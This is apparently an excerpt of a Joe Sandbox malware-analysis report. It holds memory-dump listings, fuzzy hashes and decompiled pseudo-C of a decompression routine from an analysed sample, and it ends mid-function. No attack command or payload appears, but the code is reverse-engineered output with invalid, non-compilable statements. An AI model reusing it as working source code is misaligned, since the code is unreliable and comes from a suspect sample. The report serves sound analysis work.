Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05

Uniqueness

Uniqueness Score: -1.00%

Function 0040711C Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040711C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
